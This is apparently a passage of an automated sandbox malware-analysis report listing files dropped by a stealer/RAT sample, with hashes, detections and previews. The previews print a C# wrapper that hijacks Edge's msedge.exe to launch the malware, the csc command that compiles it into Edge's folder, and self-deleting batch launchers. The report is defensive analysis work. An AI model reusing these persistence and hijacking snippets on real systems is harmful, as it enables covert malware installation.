                                                                                                                                                                                                            SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4608
                                                                                                                                                                                                            Entropy (8bit):3.9005333296961084
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:6ym1t9xZ8RxeOAkFJOcV4MKe28dQcSy4/vqBH/uulB+hnqXSfbNtm:o6xvxVx9wqSvkRTkZzNt
                                                                                                                                                                                                            MD5:ADF24C18E0EDEC447E2B4524E5D6DD1F
                                                                                                                                                                                                            SHA1:336217FE33CD2CA3750E0D4E95B1751BC7800C7F
                                                                                                                                                                                                            SHA-256:EFA987EA2403DA7114ABA959776861A958B9CFCFFEA859426923AC41ACCBB506
                                                                                                                                                                                                            SHA-512:873466ED03C22B99C68EC914230814D82085F0CAA9417E9E2368A93D4F8EF66129523DD0F4A04459FF56174783128C16721CE462F517F654DDC9BE9ECACF4A6C
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................L'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..$.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (613), with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):613
                                                                                                                                                                                                            Entropy (8bit):5.879141795742085
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:ZgKJ4ngvuXpcbV4FvCQZoKeXH04kSmN8BA/TANtxVK/QRDD:ZgEagOpGKkbk5NaA7AbxVKYRDD
                                                                                                                                                                                                            MD5:309D3DC3EC4676054CC3CE510BEDAF71
                                                                                                                                                                                                            SHA1:C9A86F42F38B99FC3D03A9AFF06A82A557516F0C
                                                                                                                                                                                                            SHA-256:5526B9CE6A6ADC44A77C6C681C0549B813BEA3712BF049876A753450161BAF17
                                                                                                                                                                                                            SHA-512:6930EB555C40F2457FD1EC914ACB2804323D259EB41674505AA9A3D84B207AC7983DC85078D6A5CF08C7FA83F547636A87D71BE854997BE456085FE796096F57
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:Y5VJ6TduJ87a6h9EvXISc96HZcvNZ0txeHhWjtSsqe5IqRmzMZp83rJY9NueiQVSOK6z9meCFZm7DybHz5B9Lv4x8IXV8xJZJm3gVx0j4n2dELVLwnpnOVHdPI00PIDRPMyb44vBEcFi2bswxMjVIgKxeaQN69TvjlN2X4Q12niwQjkyZECDjsJtBA6enhEEJT8RN0Z35rde8Yh5zcx27PM1cd1W7wOUidn6lTkjoII2PovncAoLuMH3HGzt9D5JdI5eukTf1OOyHTmxsN36HCjWWtzee0kkN8ZGsQ21rIUg7TwxeBBvJ8CaijIAuzBAnnlI3fEcVBP8rDYD7B9czzbO68hJI1H2HU2Usn486iZHtEteKFDtziKyLWM485Te4X0XLEVTHBgQZUf2PC8DxYDiJDIVa9ABO5MVNWTGutlxC3Y11Up56QqgUSNH593IBfCeHJo3s2TEwPgPpReGTEE8OpB4ILKu0cwh13trpwNE7muFv8cofwy6aDQcItvgriNTc9Yvhwah1AAm56JJtgODozGxnRj5BqWYYamwkqGtWRFaDngMklxLUKpm3kHQMefLomOeTWjCafrWupuAuXVZ2LENv939jzg1v
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1963008
                                                                                                                                                                                                            Entropy (8bit):7.552676792704024
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
                                                                                                                                                                                                            MD5:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                            SHA1:864A1DA1AF2E7B5049B8E7A93402D2BDED518681
                                                                                                                                                                                                            SHA-256:1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
                                                                                                                                                                                                            SHA-512:56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Idle.exe, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Idle.exe, Author: Joe Security
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                            • Filename: povqqKBcoP.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: 4tXm5yPtiy.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: UY9hUZn4CQ.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: gh3zRWl4or.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: seoI30IZZr.exe, Detection: malicious, Browse
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)...*...8I...(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Idle.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1613
                                                                                                                                                                                                            Entropy (8bit):5.370675888495854
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktGqZ4vwmj0qD
                                                                                                                                                                                                            MD5:5ACBB013936118762389287938AE0885
                                                                                                                                                                                                            SHA1:12C6B0AA2B5238E3154F3B538124EE9DB0E496D6
                                                                                                                                                                                                            SHA-256:28E292538199310B7DA27C6C743EFD34E1F806D28611B6C9EF4212D132272DEF
                                                                                                                                                                                                            SHA-512:E803C699BE7FC25FF09D1DEE86412CE8F18834E22E20B7D036323B740891A64B2CE33D0E0BD075178F0B6F496BA9CFBF7EF1A0884FE5E470C8CCF6D824891C77
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1396
                                                                                                                                                                                                            Entropy (8bit):5.350961817021757
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                                                                                                                                            MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                                                                                                                                            SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                                                                                                                                            SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                                                                                                                                            SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                                                                                                                                                            Process:C:\Windows\Speech\physmeme.exe
                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):425
                                                                                                                                                                                                            Entropy (8bit):5.353683843266035
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                            MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                            SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                            SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                                                            SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                            Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:NlllulJnp/p:NllU
                                                                                                                                                                                                            MD5:BC6DB77EB243BF62DC31267706650173
                                                                                                                                                                                                            SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                                                                                                                                            SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                                                                                                                                            SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:@...e.................................X..............@..........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Idle.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25
                                                                                                                                                                                                            Entropy (8bit):4.373660689688185
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:mBrIXuByMH:m+Q
                                                                                                                                                                                                            MD5:DF9FF341B171855E117F9872655EB4B8
                                                                                                                                                                                                            SHA1:541000CA38A44F5C0F1C2B42E520C1789857CEA9
                                                                                                                                                                                                            SHA-256:FEDB63F2EEFC23366038D6E34A6436174C9760C9F521880C91DB90C2883CDDB1
                                                                                                                                                                                                            SHA-512:E98F697C9DB5719EA6E837EE46A48D0A2D6CD8A3D57121389877F7EB0C33F5A7E712BDC9F4EEB85B59DD87ADCBA520C1E12C22E8547CE3ADC554D921BE361E23
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:efAOKWpWcGMqDvfs578EHyWib
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):403
                                                                                                                                                                                                            Entropy (8bit):4.972980984140053
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLAZc/EiFkD:JNVQIbSfhWLzIiFkMSfhscFkD
                                                                                                                                                                                                            MD5:FC0B7B0A98D93B3D19267386EBB8522D
                                                                                                                                                                                                            SHA1:81BB2F6A8BC7B0825E81544E09C00F5476852B80
                                                                                                                                                                                                            SHA-256:71C2E8E74DB9F514F469CDA3D3F0CCBB97145A24A7B027E7878A45C47133A5CA
                                                                                                                                                                                                            SHA-512:2349C072E3906226BE72C2D647328E15C736DCC14729F7C2B4C55C6099F4A3DC139C991A0D4BCBFC38CE0D0DED1F7FADD4B4D26B0783A13BA7D06C0FC5E2D3F2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\Idle.exe"); } catch { } }).Start();. }.}.
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):269
                                                                                                                                                                                                            Entropy (8bit):5.1673139180347185
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8ocNwi23fG/O:Hu7L//TRRzscQlZ+/O
                                                                                                                                                                                                            MD5:C623731E643E3636B689320973693CC6
                                                                                                                                                                                                            SHA1:60ABDACD3711086F7F602A428E0D6CF262961973
                                                                                                                                                                                                            SHA-256:3FFE3BCD4E2EA8521A07606009EA2A0362474512B6700C7CA598756B2DFDDDC6
                                                                                                                                                                                                            SHA-512:8E743FAB6E27742E675A457527C697336B442E1E9F361E402CCC486C7CC7735D1E3630726FF2B1FC0F141E265564DDC75D772AF2EBE2F7AC964413643F8AD840
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.0.cs"
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (333), with CRLF, CR line terminators
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):754
                                                                                                                                                                                                            Entropy (8bit):5.264528207546698
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:apI/u7L//TRRzscQlZ+/vKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/VRzstDivKax5DqBVKVrdFAMBt
                                                                                                                                                                                                            MD5:0D1F5778D6502B5B2190575273FDB432
                                                                                                                                                                                                            SHA1:C17EB0AB67B0B1C3D41F19548613121EA52C7B2F
                                                                                                                                                                                                            SHA-256:3E1E712258A964EDC950C187E3CEF0F2DB2EDDC41BE4DE2A6736AE8892213488
                                                                                                                                                                                                            SHA-512:303F30523013EBBF190E22BE3F8E7FDDF4E1CA8E6F2D35632F8C630DE0050D45F07EE0764BD71ABE853A5DF7B8A5B1420815B69DC21A6F5B2AC9F577E7F40AEF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Idle.exe
                                                                                                                                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                            Entropy (8bit):5.005246970377696
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m10nacwRE2J5s/PBvBktKcKZG10nacwRE2J5xAIpRH:hCRLuVFOOr+DE1cNwi23s/pvKOZG1cNS
                                                                                                                                                                                                            MD5:45E05E440FAA19CE817E95A7541B90C1
                                                                                                                                                                                                            SHA1:7646478A21D0AF1DB118E1ADBF19F01DD1288BBC
                                                                                                                                                                                                            SHA-256:43A3E7965C3B10D0DD047F1BBC0E3E9770F2C721983EE4D34241CC84C6C00855
                                                                                                                                                                                                            SHA-512:81B8E00C0174C300D62562F0EF41AE2AD8F0B0D395F3BF1819B367F740DEBBE9DBEF56FA29F9065671AB0335CE5C0FF4D64836A395385CD30A29F8333C83DB33
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\Idle.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\AntDRUzUoe.bat"
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):198
                                                                                                                                                                                                            Entropy (8bit):5.109115510110525
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:mKDDVNGvT2XuFK+KdTVpM3No+HK9ATSV+jn9mF5XIvBktKcKZG10nacwRE2J5xAg:hCijTg3Nou1SV+DE74vKOZG1cNwi23fz
                                                                                                                                                                                                            MD5:640B0998E5745674DF0068D8B9A58C2E
                                                                                                                                                                                                            SHA1:3729305F15FD83A020786F32C30D9A1BCB1BCD7D
                                                                                                                                                                                                            SHA-256:C5E231E09AE82C150C6599EE7CB426736EEFD250F6ADD38F5D273776E7F2C7F5
                                                                                                                                                                                                            SHA-512:989FD727242288DAC0FA82434FD8C4983ED67294FC87A1BC37CBB0CC024493BA457FB03D97BF94B5EA4293604C324E879390E079C939D7F8B4FABEFD23E21865
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Edge\msedge.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\CmSUPSwWTx.bat"
                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6c4, 10 symbols, created Mon Sep 30 20:15:27 2024, 1st section name ".debug$S"
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):1916
                                                                                                                                                                                                            Entropy (8bit):4.604424495301313
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:Hte9s6Lzc84nZH5fwK80N6lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+qcN:YLzMnZZoK80klmuulB+hnqXSfbNtmhP
                                                                                                                                                                                                            MD5:2E065C6622964602405EF566CF3291DB
                                                                                                                                                                                                            SHA1:B0CBED5A41022FAA441033D93D1FFB31525034F6
                                                                                                                                                                                                            SHA-256:52DC0B221182096785143C595D6EABFD598DE59ADDA826E55D410F6903EB16DE
                                                                                                                                                                                                            SHA-512:F1A191D657D9AB956EAB2372BAB74F25C274CBCE0A345D225133DC22DEB4E6BDCA8946EC6126E892451E125F17029FB2CB87F59FE4BF8BF5EF675BC4B77AEDB7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:L......f.............debug$S........L...................@..B.rsrc$01................x...........@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP....................q.QK.......N..........7.......C:\Users\user~1\AppData\Local\Temp\RESBBC9.tmp.-.<....................a..Microsoft (R) CVTRES.O.=..cwd.C:\Edge.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.
                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6dc, 10 symbols, created Mon Sep 30 20:15:27 2024, 1st section name ".debug$S"
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):1940
                                                                                                                                                                                                            Entropy (8bit):4.5484090185890755
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:HFPW9xGOW8ZHlwK80NyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+AlUZ:5sXW8ZmK80MluOulajfqXSfbNtmhFZ
                                                                                                                                                                                                            MD5:452CD7408DB84ABD296557711E50A140
                                                                                                                                                                                                            SHA1:BB767B48D2900A899016477D3C54048B0D5D8DE3
                                                                                                                                                                                                            SHA-256:812A0FE776C97E9AEF1F331CEA97FA1F725D54B5BB6854D8A0371BED67A3DF66
                                                                                                                                                                                                            SHA-512:AB8FF7D6B7712C6784ADA371E7EDE7680892C9E33AE94DE02A795B07F557FA8ACDFA659A60C4137D68F2124D60723E2E842CB33B4FAA58FB689023828D05E8D1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:L......f.............debug$S........,...................@..B.rsrc$01................X...........@..@.rsrc$02........p...l...............@..@........:....c:\Windows\System32\CSC75DA780D41F148BEB3E8CF69CEFFE.TMP....................r.av..t.y..............7.......C:\Users\user~1\AppData\Local\Temp\RESBDCC.tmp.-.<....................a..Microsoft (R) CVTRES.O.=..cwd.C:\Edge.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
                                                                                                                                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):198
                                                                                                                                                                                                            Entropy (8bit):5.098014557178933
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:hCijTg3Nou1SV+DE74vKOZG1cNwi23fRWH:HTg9uYDE3Z8H
                                                                                                                                                                                                            MD5:A673ABC330F63171A0F71F189F74BE9E
                                                                                                                                                                                                            SHA1:CDCF0FB2A113DE9B093E518F2317450715065C8F
                                                                                                                                                                                                            SHA-256:D980F0A040667D42F1C7060721F9C73DAEE6FF4B9344013D84D278AC7D27CDA7
                                                                                                                                                                                                            SHA-512:8C9F53A5D7B2B2151FABB496CB55CEBB8C6ADFDFC5D7DFE76488B5AE07BC8D590C9C10328A32B674A2E56B3019349D860E3CDED3637A1F1C21EF4EC18CBEB530
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Edge\msedge.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\TkseHYIaPv.bat"
                                                                                                                                                                                                            Process:C:\Edge\msedge.exe
